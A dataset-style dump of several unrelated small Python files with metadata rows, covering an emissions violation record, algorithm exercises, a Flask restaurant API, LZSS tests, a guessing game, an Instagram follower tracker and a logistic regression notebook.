| 2,371 | 2.6875 | 3 |
[] |
no_license
|
from decimal import Decimal
class ViolationRecord:
"""
This class encapsulates the recommendation data.
"""
def __init__(self):
self.year = ''
self.state = ''
self.efsi = ''
self.fsn = ''
self.lead_latest, self.lead_mean = 'no data', 'no data'
self.co_latest, self.co_mean = 'no data', 'no data'
self.nox_latest, self.nox_mean = 'no data', 'no data'
self.pmpri_latest, self.pmpri_mean = 'no data', 'no data'
self.so2_latest, self.so2_mean = 'no data', 'no data'
self.voc_latest, self.voc_mean = 'no data', 'no data'
self.in_violation = 'N'
def update_in_violation(self):
"""
This method does not return anything.
It compares the data from the latest year, to the mean of the data from the previous years,
and sets the in_violation property to Y, if in violation (i.e. needs recommendation).
It sets the in_violation property to Y, if and only if ALL of the following conditions are satisfied -
1. Latest year's data is not the same as the mean of the previous years' data.
2. Latest year's data is not 'no data'
3. Mean is not 'no data'
4. Latest year's data is greater than the mean of the previous years' data.
"""
latest = [self.lead_latest, self.co_latest, self.nox_latest, self.pmpri_latest, self.so2_latest, self.voc_latest]
mean = [self.lead_mean, self.co_mean, self.nox_mean, self.pmpri_mean, self.so2_mean, self.voc_mean]
latest_and_mean = list(zip(latest, mean))
for tup in latest_and_mean:
if not tup[0] == tup[1]:
if not tup[0] == 'no data':
val1 = Decimal(tup[0])
if not tup[1] == 'no data':
val2 = Decimal(tup[1])
if val1 and val2:
if val1 > val2:
self.in_violation = 'Y'
def __str__(self):
return ','.join([self.efsi, self.fsn, self.state, self.year, self.lead_latest, self.lead_mean,
self.co_latest, self.co_mean, self.nox_latest, self.nox_mean,
self.pmpri_latest, self.pmpri_mean, self.so2_latest, self.so2_mean,
self.voc_latest, self.voc_mean, self.in_violation])
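
# Minimal usage sketch (attribute values are illustrative only):
#
#   record = ViolationRecord()
#   record.co_mean = '1.5'     # mean of the previous years
#   record.co_latest = '2.0'   # latest year exceeds the mean
#   record.update_in_violation()
#   record.in_violation        # -> 'Y'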
| true |
2451e398988872784f2ea63875660e5ce9c559f4
|
Python
|
AllenKd/algorithm_practice
|
/second_stage/pythagorean_triplet_in_array.py
|
UTF-8
| 435 | 3.421875 | 3 |
[] |
no_license
|
def pythagorean_triplet(arr):
arr = sorted([i ** 2 for i in arr])
for i in range(len(arr)-1, 1, -1):
j = 0
k = i - 1
while j < k:
if arr[j] + arr[k] == arr[i]:
return True
elif arr[j] + arr[k] < arr[i]:
j += 1
else:
k -= 1
return False
if __name__ == '__main__':
print(pythagorean_triplet([3, 1, 4, 6, 5]))
| true |
01b7c371c432dd20ec30b296d6fa0d80c27e47be
|
Python
|
jcai0o0/My_Leetcode_Solutions
|
/September_2020/sep_21_Car_Pooling.py
|
UTF-8
| 376 | 2.828125 | 3 |
[] |
no_license
|
class Solution:
def carPooling(self, trips: List[List[int]], capacity: int) -> bool:
temp = []
for n, start, end in trips:
temp.append((start, n))
temp.append((end, -n))
temp.sort()
par = 0
for i in temp:
par += i[1]
if par > capacity:
return False
return True
| true |
2177b4a7362fb057b88d98a6a863454ef177d15b
|
Python
|
lishion/easy-spider
|
/easy_spider/core/recoverable.py
|
UTF-8
| 2,930 | 3 | 3 |
[] |
no_license
|
from abc import ABC, abstractmethod
from os.path import exists, join
from typing import List
from easy_spider.tool import pickle_load, pickle_dump, get_type_name
class Recoverable(ABC):
@abstractmethod
def stash(self, resource): pass
@abstractmethod
def recover(self, resource): pass
@classmethod
def recover_name(cls): return cls.__name__
@abstractmethod
def can_recover(self, resource): pass
class FileBasedRecoverable(Recoverable, ABC):
"""
    Persist the spider with pickle.
    Subclasses only need to implement stash_attr_names, which lists the attrs to save.
    All attrs to be saved are collected into a dict {attr1: value1, ...} and dumped with pickle.
    On recovery the attrs are restored with setattr.
"""
def __init__(self):
self._stash_attr_names = self.stash_attr_names()
for attr in self._stash_attr_names:
self._check_stash_attr(attr)
@classmethod
def recover_name(cls):
return super().recover_name() + ".pickle"
def _check_stash_attr(self, attr):
if attr not in self.__dict__:
raise AttributeError("can't find stash attr `{}`".format(attr))
@abstractmethod
def stash_attr_names(self) -> List[str]: pass
def can_recover(self, resource):
return exists(self._get_stash_file_uri(resource))
def _get_stash_file_uri(self, resource):
return join(resource, self.recover_name())
def stash(self, resource):
"""
        Save the stashed attrs to {resource}/{self.__class__.__name__}.pickle
        :param resource: directory in which the file is stored
:return: None
"""
attrs_to_stash = {attr: value for attr, value in self.__dict__.items() if attr in self._stash_attr_names}
pickle_dump(attrs_to_stash, self._get_stash_file_uri(resource))
def recover(self, resource):
"""
        Recover from {resource}/{self.__class__.__name__}.pickle
        :param resource: directory in which the file is stored
:return: None
"""
attrs_to_stash = pickle_load(self._get_stash_file_uri(resource))
for attr, value in attrs_to_stash.items():
setattr(self, attr, value)
# class BufferedRecoverable(ABC):
#
# @abstractmethod
# def write(self): pass
#
# @abstractmethod
# def recover(self): pass
class CountDown:
def __init__(self, start):
if start <= 0:
raise ValueError("start must > 1, get `{}`".format(start))
self._start = start
self._now = start
self._actions = []
def add_actions(self, action):
if not callable(action):
raise TypeError("action must be a callable, got `{}`".format(get_type_name(action)))
self._actions.append(action)
def count(self):
self._now -= 1
if self._now == 0:
for action in self._actions:
action()
self._now = self._start
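

if __name__ == "__main__":
    # Minimal sketch (not part of the original module; assumes the easy_spider package
    # is importable): a CountDown that fires its action on every third call to count().
    countdown = CountDown(3)
    countdown.add_actions(lambda: print("checkpoint reached"))
    for _ in range(6):
        countdown.count()  # prints twice, after the 3rd and the 6th call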
| true |
7ac1d75c5122dad09a7b891d2ad4dc0e0c3536a6
|
Python
|
nikpaa/compress_project
|
/src/tests/lzss_test.py
|
UTF-8
| 1,041 | 2.90625 | 3 |
[] |
no_license
|
import unittest
from lzss import lzss_encode, lzss_decode
class TestLZSSFunctionality(unittest.TestCase):
def test_simple_encode(self):
test_string = bytearray(b'best test in bestest tester fest')
result_string = b'\x0cbest t\t\x05\x06in \t\r\x11\x10\x08er f\x07\x07'
self.assertEqual(lzss_encode(test_string), result_string)
def test_buffer_size_affects_output(self):
test_string = bytearray(b'test test golden retilou test')
self.assertNotEqual(lzss_encode(test_string, 50),
lzss_encode(test_string, 5))
def test_simple_decode(self):
test_string = b'\x14test in a \t\n'
result_string = bytearray(b'test in a test')
self.assertEqual(lzss_decode(test_string), result_string)
def test_simple_encode_decode(self):
test_string = bytearray(b'testing a testy tester in a tester network of testers')
self.assertEqual(lzss_decode(lzss_encode(test_string)), test_string)
if __name__ == '__main__':
unittest.main()
| true |
68e802610a169a6772b26cc5076fa2582da191fa
|
Python
|
Heron593/Heron_project
|
/Python/test_with_open_as.py
|
UTF-8
| 685 | 3.09375 | 3 |
[] |
no_license
|
import re
with open('d:/data.txt', 'w') as f:
f.write('hello world3')
'''open read/write modes:
rU or Ua  open for reading with universal newline support (PEP 278)
w   open for writing
a   open for appending (starts at EOF, creates the file if necessary)
r+  open for reading and writing
w+  open for reading and writing (see w)
a+  open for reading and writing (see a)
rb  open for reading in binary mode
wb  open for writing in binary mode (see w)
ab  open for appending in binary mode (see a)
rb+ open for reading and writing in binary mode (see r+)
wb+ open for reading and writing in binary mode (see w+)
ab+ open for reading and writing in binary mode (see a+)'''
| true |
f334afca6ed166b2c18bb37b8c82fc29cc58ddf8
|
Python
|
jfc4050/SLAlgorithms1
|
/Deterministic Selection.py
|
UTF-8
| 1,697 | 3.6875 | 4 |
[] |
no_license
|
def dSelect(arrA, queryIndex, lIndex=0, rIndex=None):
# returns value of arrA[queryIndex]
if rIndex is None:
rIndex = len(arrA)
if lIndex == rIndex:
# terminate if array length reaches 0
return
if rIndex-lIndex <= 5:
# select first element as pivVal if array size is <= 5
pivVal = arrA[lIndex]
else:
# deterministic pivot selection
arrC = []
        for i in range(lIndex, rIndex, 5):  # each chunk of <= 5 elements in arrA
            chunk = arrA[i:i+5]
            arrC.append(dSelect(chunk, len(chunk)//2))  # find and append its median to arrC
# pivVal is "median of medians"
pivVal = dSelect(arrC, len(arrC)//2)
# put pivVal at beginning of array
arrA[arrA.index(pivVal)], arrA[lIndex] = arrA[lIndex], arrA[arrA.index(pivVal)]
# partition arrA around pivVal
boundIndex = lIndex+1
for currentIndex in range(boundIndex, rIndex):
if arrA[currentIndex] < pivVal:
arrA[boundIndex], arrA[currentIndex] = arrA[currentIndex], arrA[boundIndex]
boundIndex += 1
pivIndex = boundIndex-1 #find currentIndex value of pivVal
# place pivVal in rightful position
arrA[lIndex], arrA[pivIndex] = arrA[pivIndex], arrA[lIndex]
# recursive call to make is determined by
# location of queryIndex relative to pivIndex
if queryIndex < pivIndex:
return dSelect(arrA, queryIndex, lIndex, pivIndex)
if pivIndex == queryIndex:
return arrA[pivIndex]
if queryIndex > pivIndex:
return dSelect(arrA, queryIndex, pivIndex+1, rIndex)
array = [0, 9, 7, 4, 2, 3, 5, 1, 6, 8]
print(dSelect(array, 2))
| true |
3a0997b173170edb516c4c105911593be6d297f8
|
Python
|
sikdarsaurav10/RestAPI
|
/zenithApp/webApp/restrauntapi/routes.py
|
UTF-8
| 5,684 | 2.71875 | 3 |
[] |
no_license
|
import random
import string
from flask import Blueprint, jsonify, request, url_for, make_response
from webApp import db
from webApp.models import Food, Menu
from webApp.utils import save_rest_pic, login_required
food = Blueprint('Food', __name__)
# to save or push a new restraunt record
@food.route('/food_details/new', methods=['POST'])
@login_required
def create_food(current_user):
if not current_user.admin:
return make_response('Not permitted!!', 401)
data = request.get_json()
alphabet = string.ascii_letters + string.digits
restraunt_id = ''.join(random.choice(alphabet) for i in range(10))
newFood = Food(restraunt_id=restraunt_id,
name=data['name'],
descp=data['description'],
contact=data['contact'])
db.session.add(newFood)
db.session.commit()
return jsonify({'message': 'Restraunt Record saved'})
# to update a restraunt record in the database
@food.route('/food_details/<restraunt_id>', methods=['PUT'])
@login_required
def update_food(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
rest = Food.query.filter_by(restraunt_id=restraunt_id)\
.first()
if not rest:
return jsonify({'message': 'NO RESTRAUNT FOUND!!'})
data = request.get_json()
rest.name = data['name']
rest.descp = data['description']
rest.contact = data['contact']
db.session.commit()
return jsonify({'message': 'Restraunt Record updated'})
# to delete a restraunt record in the database
@food.route('/food_details/remove', methods=['DELETE'])
@login_required
def delete_food(current_user):
if not current_user.admin:
return make_response('Not permitted!!', 401)
if request.args:
data = request.args.get('restraunt_id')
rest = Food.query.filter_by(restraunt_id=data).first_or_404()
db.session.delete(rest)
db.session.commit()
return jsonify({'message': 'Restraunt Record deleted'})
return ('No argumnets given', 401)
# upload the image for the Restraunt services
@food.route('/food_prof_pic/upload/<restraunt_id>', methods=['PUT'])
@login_required
def upload_food_img(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
file_name = request.files['file']
file_t = save_rest_pic(file_name)
user = Food.query.filter_by(restraunt_id=restraunt_id).first_or_404()
user.prof_img = file_t
db.session.commit()
return jsonify({'message': 'File saved successfully',
'file name': file_t})
# to get the restraunt profile pic
@food.route('/food_prof_pic/<restraunt_id>', methods=['GET'])
def get_rest_prof_pic(restraunt_id):
img_query = Food.query.filter_by(restraunt_id=restraunt_id).first()
image_file = url_for('static', filename='images/restraunt_service_img/' + img_query.prof_img)
return jsonify({'restraunt_prof_img_url': image_file})
# to get all the Restraunt services
@food.route('/food_details', methods=['GET'])
@login_required
def get_rest(current_user):
page = request.args.get('page', 1, type=int)
allFood = Food.query.paginate(page=page, per_page=10)
output = []
for rest in allFood.items:
output_data = {}
output_data['restraunt_id'] = rest.restraunt_id
output_data['name'] = rest.name
        output_data['description'] = rest.descp
output_data['contact'] = rest.contact
output_data['prof_img'] = rest.prof_img
output.append(output_data)
return jsonify({'All Restraunts': output})
# get the menu for the specific restraunt
@food.route('/food_menu/<restraunt_id>', methods=['GET'])
@login_required
def get_food_menu(current_user, restraunt_id):
rest = Food.query.filter_by(restraunt_id=restraunt_id).first()
menuItem = Menu.query.filter_by(restraunt=rest).all()
output = []
for item in menuItem:
output_data = {}
output_data['id'] = item.id
output_data['food_item'] = item.food_item
if not item.item_type:
output_data['Type'] = 'Veg'
elif item.item_type:
output_data['Type'] = 'Non Veg'
output.append(output_data)
return jsonify({'Menu': output})
# upload the menu for the specific restraunt
@food.route('/food_menu/new/<restraunt_id>', methods=['POST'])
@login_required
def upload_food_menu(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
if request.is_json:
data = request.get_json()
rest = Food.query.filter_by(restraunt_id=restraunt_id).first()
menu = Menu(food_item=data['item'], item_type=data['type'],
restraunt=rest)
db.session.add(menu)
db.session.commit()
return jsonify({'message': 'Saved', 'Item': data['item']})
return make_response('No Menu Items given', 401)
# delete the menu for the specific restraunt
@food.route('/food_menu/remove/<restraunt_id>', methods=['DELETE'])
@login_required
def delete_food_menu(current_user, restraunt_id):
if not current_user.admin:
return make_response('Not permitted!!', 401)
if request.args:
data = request.args
rest = Food.query.filter_by(restraunt_id=restraunt_id)\
.first_or_404()
id = data['id']
menu = Menu.query.filter_by(restraunt=rest).filter(Menu.id == id)\
.first()
db.session.delete(menu)
db.session.commit()
return jsonify({'message': 'deleted'})
return make_response('No Menu Items given', 401)
| true |
8ba7c0a13ef72657bb1eb02578f777cffbfaed18
|
Python
|
lessunc/python-guanabara
|
/task058.py
|
UTF-8
| 1,272 | 4.34375 | 4 |
[
"MIT"
] |
permissive
|
#coding: utf-8
#-----------------------------------------------------------------
# A game in which the program picks a number between 0 and 10.
# It then asks the player to guess which one it was, accepting
# values until the guess equals the one chosen by the program, and
# reporting how many rounds were needed to guess it.
#------------------------------------------------------------------
# Guessing Game v2.0 - Exercise #058
#------------------------------------------------------------------
from random import randint
tentativas = 1
print('\033[1;35mSou seu computador...\033[m')
print('Acabei de pensar em um número entre 1 e 10.')
print('Será que você consegue adivinhar qual foi?')
gerador = randint(1,10)
acertou = False
while not acertou:
n = int(input('\n\033[35mQual é seu palpite: \033[m'))
if n == gerador:
acertou = True
else:
if n < gerador:
print(f'Mais.. Tente outra vez.')
tentativas += 1
elif n > gerador:
print(f'Menos.. Tente outra vez.')
tentativas += 1
print('\033[1;35m---\033[m' * 11)  # colored separator line (not important)
print(f'Acertou com {tentativas} tentativas.. \033[35m:)')
if tentativas <= 4:
print('Muito Bom! Parabéns!\033[m')
else:
print('Tente Novamente!\033[m')
print()
| true |
82a32f62172bfcd943b1ea9dbe1adddce00732b8
|
Python
|
flrobson77/febrace
|
/facesample08.py
|
UTF-8
| 601 | 3.171875 | 3 |
[] |
no_license
|
import face_recognition
from PIL import Image
from espeak import espeak  # assumed to come from the python-espeak package, needed for the synth() calls below
image = face_recognition.load_image_file('./images/robrodtar.jpg')
face_locations = face_recognition.face_locations(image)
# (Array) coordinates of the detected faces
print("Foram encontradas ", format(len(face_locations)), "face(s) nessa imagem")
for face_location in face_locations:
top, right, bottom, left = face_location
face_image = image[top:bottom, left:right]
pil_image = Image.fromarray(face_image)
pil_image.show()
espeak.synth (format(len(face_locations)))
espeak.synth ("faces")
espeak.synth ("encontradas")
| true |
70a238a363498d0ce4d8f113c2e655834bccc499
|
Python
|
MFarelS/instagram_static
|
/main.py
|
UTF-8
| 2,011 | 2.640625 | 3 |
[] |
no_license
|
import requests, threading,time
from datetime import datetime
import matplotlib.pyplot as plt
hed = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0'}
trakhir = 0
krg = 0
pengurangan = [0,0,0,0,0,0,0]  # keep 6 data points, i.e. 60 minutes
ttt = ['60 Menit lalu','50 Menit lalu','40 Menit lalu','30 Menit lalu','20 Menit lalu','10 Menit lalu']
def jam():
f = datetime.now().strftime("%H:%M:%S")
return f
def chart():
def autolabel(rects):
for rect in rects:
height = rect.get_height()
plt.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 2), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
p = plt.bar(ttt, pengurangan[-6:], color='r')
autolabel(p)
plt.xticks(rotation = 20)
plt.savefig('p.jpg')
with open('per10-Minute.txt', 'a') as tls:
tls.write(f'{pengurangan[-1]} ---- {jam()}\n')
# plt.cla()
# plt.clf()
#plt.close('all')
def hitung(jumlah):
#print('Followers : ', jumlah)
plt.figure(dpi=100)
dt = []
pjg = len(jumlah)
p = jumlah
if pjg > 3:
sisa = pjg % 3
jml = pjg //3
if sisa != 0:
dt.append(p[:sisa])
p = p[sisa:]
for i in range(jml):
dt.append(p[:3])
p = p[3:]
jumlah = '.'.join(dt)
return jumlah
def st(nama):
global trakhir, krg
sec = 0
while True:
try:
js = requests.get('https://www.instagram.com/{}/channel/?__a=1'.format(nama), headers=hed).json()
jml = js['graphql']['user']['edge_followed_by']['count']
if trakhir == 0:
trakhir = jml
if jml < trakhir:
y = ('-'+str(trakhir-jml))
krg += trakhir-jml
else:
y = ('+'+str(jml-trakhir))
krg -= jml-trakhir
print('Follower : ',hitung(str(jml)), f' ({y}')
trakhir = jml
except:
pass
if sec == 1:
if krg < 0 :
krg = 0
pengurangan.append(krg)
sec = 0
krg = 0
t = threading.Thread(target=chart)
t.start()
sec += 1
time.sleep(1)
if __name__ == '__main__':
name = input('Username : ')
st(name)
| true |
5fbbd9d3cfc0fdb1f11a7b7cea5e6621a089aaa2
|
Python
|
h3nok/MLIntro
|
/Notebooks/core/database/data_mappers/test_classification_group.py
|
UTF-8
| 1,622 | 2.65625 | 3 |
[] |
no_license
|
from unittest import TestCase
from data_mappers.classification_group import viNetClassGroup, viNetClassGroupMapper
from tabulate import tabulate
from vinet_frame_label import viNetTrainingFrameLabel
class TestClassGroupMapper(TestCase):
class_group = viNetClassGroup('Python-Test-Classification-Group', comment="Test Case")
cgm = viNetClassGroupMapper(class_group)
def test__get(self):
groups = self.cgm.get_persisted_data()
if not groups.empty:
print(tabulate(groups, headers='keys', tablefmt='psql'))
else:
self.fail()
def test_insert(self):
if not isinstance(self.cgm.insert(), bool):
self.fail()
def test_update(self):
# 1. Create classification group
class_group = viNetClassGroup(name="E3 LSE 5 class-Test",
comment="WTE, Buzzard, "
"Other-Avian,"
"Red-Kite, LSE")
with viNetClassGroupMapper(class_group) as cgm:
# 2. Create a list of classifications to be grouped together
classifications = [viNetTrainingFrameLabel("Buzzard-sp", False),
viNetTrainingFrameLabel("Eurasian-Buzzard", False),
viNetTrainingFrameLabel("Buzzard", False)]
# 3. A group class name for the above list
mapped_to = viNetTrainingFrameLabel('Buzzard', False)
# 4. Map frame groundtruth to class group names
cgm.map_classifications(classifications, mapped_to)
| true |
712a88c36db609ca313b1c80af4a244b563d9bb1
|
Python
|
Showherda/aoc2020
|
/aoc_09_2.py
|
UTF-8
| 363 | 2.8125 | 3 |
[] |
no_license
|
import sys
sys.stdin=open('input.txt')
inp=[int(v) for v in sys.stdin.readlines()]
n=len(inp)
val=542529149
num=inp.copy()
for i in range(1, n):
num[i]+=num[i-1]
p1=0
while p1<n:
p2=p1
while num[p2]-num[p1]<val:
p2+=1
if p2-p1>1 and num[p2]-num[p1]==val:
print(min(inp[p1+1:p2+1])+max(inp[p1+1:p2+1]))
while p2>p1 and num[p2]-num[p1]>val:
p1+=1
p1+=1
| true |
6dc9e83e24d1a2e0243fc5b60b1ac4f41a843a7f
|
Python
|
Lv-474-Python/ngfg
|
/src/tests/app/helper/test_row_validation.py
|
UTF-8
| 1,062 | 3.125 | 3 |
[] |
no_license
|
"""
Tests for a google sheet row validator
"""
from app.helper.row_validation import validate_row
def test_validate_row_valid():
"""
Test for validate_row()
Test case for when row has been specified correctly
"""
row = 'AAA123'
assert validate_row(row) is True
def test_validate_row_extra_letters():
"""
Test for validate_row()
Test case for when row parameter is invalid because of extra letters
"""
row_extra_letters = 'AAAA123'
assert validate_row(row_extra_letters) is False
def test_validate_row_non_empty_split():
"""
Test for validate_row()
Test case for when row parameter is invalid because of a non-empty string at the end after the split
"""
row_non_empty_split = 'AAA123AAA'
assert validate_row(row_non_empty_split) is False
def test_validate_row_extra_splits():
"""
Test for validate_row()
Test case for when row parameter is invalid because of extra symbols
"""
row_extra_splits = 'AAA123AAA123'
assert validate_row(row_extra_splits) is False
| true |
0f542843dcc5a0fd107b8f96a917e5da8bfc11dc
|
Python
|
Nahom-S/python-file
|
/amharic app.py
|
UTF-8
| 686 | 2.921875 | 3 |
[] |
no_license
|
from tkinter import *
me = Tk()
me.title("ልምምድ")
e = Entry(me, width=35, bg="blue", fg="yellow", borderwidth=5)
e.grid(row=0, column=1, columnspan=1, padx=40, pady=40)
def button1():
try:
x = e.get()
e.delete(0, END)
c = int(x) + 1
e.insert(0, c)
except:
e.delete(0, END)
e.insert(0, "ቁጥር ያስገቡ")
button1 = Button(me, text="አንድ ጨምር", bg="red", fg="green", padx=20, pady=10, command=button1)
button1.grid(row=1, column=1)
xx = Label(me, text=" አሁን እዚህ ቁጥር ላይ ነን------->", padx=30, pady=30)
xx.grid(row=0, column=0)
me.mainloop()
| true |
74ec49b19db64ebcbb1d43b9f7f27ba182b5313c
|
Python
|
troyhonegger/agbot-srvr
|
/lib/darknet_wrapper.py
|
UTF-8
| 2,027 | 2.671875 | 3 |
[] |
no_license
|
'''
This module allows us to run darknet on in-memory images, rather than writing an image to
disk and then reading it again using darknet. This should substantially speed up the process.
Admittedly, most of this is shamelessly copied off the Internet, with very minimal modifications.
Credits go to Glenn Jocher for a blog post with most of this code - find it online at
https://medium.com/@glenn.jocher/i-was-searching-for-a-fast-darknet-python-binding-also-but-found-what-i-needed-natively-within-the-11fcb76fe31e
'''
from darknet import *
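# Typical usage (a sketch only -- load_net/load_meta are assumed from darknet's
# bundled python wrapper, and the cfg/weights/data paths are placeholders):
#   net = load_net(b'cfg/yolov3.cfg', b'yolov3.weights', 0)
#   meta = load_meta(b'cfg/coco.data')
#   detections = detect_cv2(net, meta, cv2.imread('data/dog.jpg'))  # requires cv2 to be imported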
def array_to_image(arr):
arr = arr.transpose(2, 0, 1)
c = arr.shape[0]
h = arr.shape[1]
w = arr.shape[2]
arr = (arr / 255.0).flatten()
data = c_array(c_float, arr)
# I don't think darknet should change any of this. So we should be alright
# without freeing im
im = IMAGE(w, h, c, data)
return im
def detect_cv2(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
if isinstance(image, bytes):
# image is a filename
# i.e. image = b'/darknet/data/dog.jpg'
im = load_image(image, 0, 0)
elif isinstance(image, str):
im = load_image(image.encode('utf-8'), 0, 0)
else:
# image is a numpy array
# i.e. image = cv2.imread('/darknet/data/dog.jpg')
im = array_to_image(image)
rgbgr_image(im)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im)
dets = get_network_boxes(net, im.w, im.h, thresh,
hier_thresh, None, 0, pnum)
num = pnum[0]
if nms: do_nms_obj(dets, num, meta.classes, nms)
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
res.append((meta.names[i], dets[j].prob[i],
(b.x, b.y, b.w, b.h)))
res = sorted(res, key=lambda x: -x[1])
if isinstance(image, bytes) or isinstance(image, str): free_image(im)
free_detections(dets, num)
return res
| true |
bb64ca6c4a927ef11c2325923372e914579449b5
|
Python
|
BIRDDYTTP/elabProgrammingConcept
|
/python/trial/กบกระโดด.py
|
UTF-8
| 580 | 3.984375 | 4 |
[] |
no_license
|
depth = int(input("Enter the depth of the well : "))
jump = int(input("Enter the height the frog can jump : "))
slip = int(input("Enter the height the frog slips down : "))
day = 1
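# Simulate day by day: each day the frog jumps up, and if it has not cleared
# the well it slips back down at night.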
if jump <= slip and jump < depth:
    print("The frog will never escape from the well.")
else:
while depth > jump :
leaps = depth - jump
print("On day %d the frog leaps to the depth of %d meters." %(day,leaps))
depth = leaps + slip
print("At night he slips down to the depth of %d meters." %depth)
day += 1
print("The frog can escape the well on day %d." %day)
| true |
b39a12b1e2fc5afc819743a89686db86824055c0
|
Python
|
IngabireTina/m_blog
|
/tests/comment_test.py
|
UTF-8
| 1,585 | 2.59375 | 3 |
[] |
no_license
|
import unittest
from app.models import Comment, Blog, User
from app import db
class CommentInstanceTest(unittest.TestCase):
    def setUp(self):
        self.user_tina = User(username='tina', password='tina', email='tina@gmail.com')
        self.new_blog = Blog(id=1, title='Test', post='post', user_id=self.user_tina.id)
        self.new_comment = Comment(id = 1, comment = 'comment', user = self.user_tina, blog_id = self.new_blog)
def tearDown(self):
Blog.query.delete()
User.query.delete()
def test_check_instance_variables(self):
self.assertEquals(self.new_comment.comment,'comment')
self.assertEquals(self.new_comment.user,self.user_tina)
self.assertEquals(self.new_comment.blog_id,self.new_blog)
class CommentModelTest(unittest.TestCase):
def setUp(self):
self.user_tina = User(username='tina', password='tina', email='tina@gmail.com')
self.new_blog = Blog(id=1, title='Test', post='post', user_id=self.user_tina.id)
self.new_comment = Comment(id=1, comment ='comment', user_id=self.user_tina.id, blog_id = self.new_blog.id )
def tearDown(self):
Blog.query.delete()
User.query.delete()
Comment.query.delete()
def test_check_instance_variables(self):
self.assertEquals(self.new_comment.comment, 'comment')
self.assertEquals(self.new_comment.user_id, self.user_tina.id)
self.assertEquals(self.new_comment.blog_id, self.new_blog.id)
def test_save_comment(self):
self.new_comment.save()
self.assertTrue(len(Comment.query.all()) > 0)
def test_get_comment(self):
self.new_comment.save()
got_comment = Comment.get_comment(1)
        self.assertTrue(got_comment is not None)
| true |
7be7588b778c00f9a7f6f46d33588be5cdb6bcf6
|
Python
|
jeffrey-hsu/w266-project-patent
|
/bag_of_words/patent_counter.py
|
UTF-8
| 1,913 | 3.21875 | 3 |
[] |
no_license
|
'''Simply counts the number of patents in the
csv file.'''
from datetime import datetime as dt
def clump(filename):
'''Sorts through the lines, combining them according
to patent number, and outputs the joined text.'''
# Initialize values
last_patent_number = 0
clump_text = ''
with open(filename, 'r') as f:
# line = [patent number, claim number, claim text, dependencies,
# ind_flg, appl_id.]
for i, line in enumerate(f):
# Ignore the header
if i == 0:
pass
else:
# Retrieve patent number and text, according to format
if '"' in line:
patent_no = line.split('"')[0].split(',')[0]
claim_text = line.split('"')[1]
else:
patent_no = line.split(',')[0]
claim_text = line.split(',')[2]
# Add to the string if it's the same patent as the last line
if patent_no == last_patent_number:
clump_text = ' '.join((clump_text, claim_text))
# Output the old line if a new patent is encountered,
# and reset the values for patent number and text
else:
if last_patent_number != 0:
yield last_patent_number, clump_text
last_patent_number = patent_no
clump_text = claim_text
yield last_patent_number, clump_text # Output the last clump as well
base_file_path = '/home/cameronbell/'
patent_claims_file = ''.join((base_file_path, 'patent_data/patent_claims_fulltext.csv'))
print(dt.now())
print('Starting to iterate')
count = 0
for i, _ in enumerate(clump(patent_claims_file)):
    if i % 1000000 == 0:
        print('%i patents processed.' % i)
    count = i + 1
print('Finished. Total clumps: %i' % count)
print(dt.now())
| true |
54830ebe784b155875ae9ed5bcd35094ee19536a
|
Python
|
PengFrankJi/machine_learning
|
/LogisticRegression/Logistic.py
|
UTF-8
| 6,314 | 2.5625 | 3 |
[] |
no_license
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import statsmodels.api as sm
import pylab as pl
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_curve, auc  # compute ROC and AUC
# In[2]:
# read the excel file
file_path = "/Users/jipeng/Documents/Study/Study_myself/Logistic_Regression/data.xlsx"
file = pd.ExcelFile(file_path)
data = file.parse("data")
# Variables unrelated to the model:id, member_id,
# Variables having only one value: term
# Variables have repeated meaning: label: loan_status, \[home_mort, home_own\]: home_ownership,
# In[3]:
columns_to_keep = ["label", "loan_amnt", "issue_d", "int_rate", "installment", "grade", "emp_length", "home_mort", "home_own", "FICO", "annual_inc", "loantoincome", "dti", "delinq_2yrs", "inq_last_6mths", "open_acc", "pub_rec", "revol_bal", "revol_util", "total_acc", "tot_cur_bal", "total_rev_hi_lim", "acc_open_past_24mths", "avg_cur_bal", "bc_open_to_buy", "bc_util", "mo_sin_old_il_acct", "mo_sin_old_rev_tl_op", "mo_sin_rcnt_rev_tl_op", "mo_sin_rcnt_tl", "mort_acc", "mths_since_recent_bc", "num_accts_ever_120_pd", "num_actv_bc_tl", "num_actv_rev_tl", "num_bc_sats", "num_bc_tl", "num_il_tl", "num_op_rev_tl", "num_rev_accts", "num_rev_tl_bal_gt_0", "num_sats", "num_tl_op_past_12m", "pct_tl_nvr_dlq", "percent_bc_gt_75", "tot_hi_cred_lim", "total_bal_ex_mort", "total_bc_limit", "total_il_high_credit_limit"]
data = data[columns_to_keep]
# In[4]:
def convert_date_to_month(x):
if x == np.datetime64('2020-01-14'):
return 1
elif x == np.datetime64('2020-02-14'):
return 2
elif x == np.datetime64('2020-03-14'):
return 3
elif x == np.datetime64('2020-04-14'):
return 4
elif x == np.datetime64('2020-05-14'):
return 5
elif x == np.datetime64('2020-06-14'):
return 6
elif x == np.datetime64('2020-07-14'):
return 7
elif x == np.datetime64('2020-08-14'):
return 8
data["issue_d"] = [convert_date_to_month(i) for i in data['issue_d']]
# In[5]:
data = pd.concat([data, pd.get_dummies(data['grade'], prefix = 'grade').iloc[:, 1:]], axis = 1)
data = pd.concat([data, pd.get_dummies(data['emp_length'], prefix = 'emp_length').iloc[:, 1:]], axis = 1)
data = data.drop(['grade', 'emp_length'], axis = 1)
# In[6]:
data.head(30)
# In[7]:
# check how many NA's
print(np.where(np.isnan(data)))
print(data.columns[24])
print(np.where(np.isnan(data))[0].shape)
# there are 3075 NA's. We can delete observations containing NA
data = data.dropna()
# In[8]:
f = lambda x: (x - x.min()) / (x.max()-x.min())
data = data.apply(f)
# In[9]:
y = data['label']
x = data.iloc[:, 1:]
x['intercept'] = 1.0
np.random.seed(seed = 9)
row = x.shape[0]
shuffle_indexes = np.random.permutation(row)
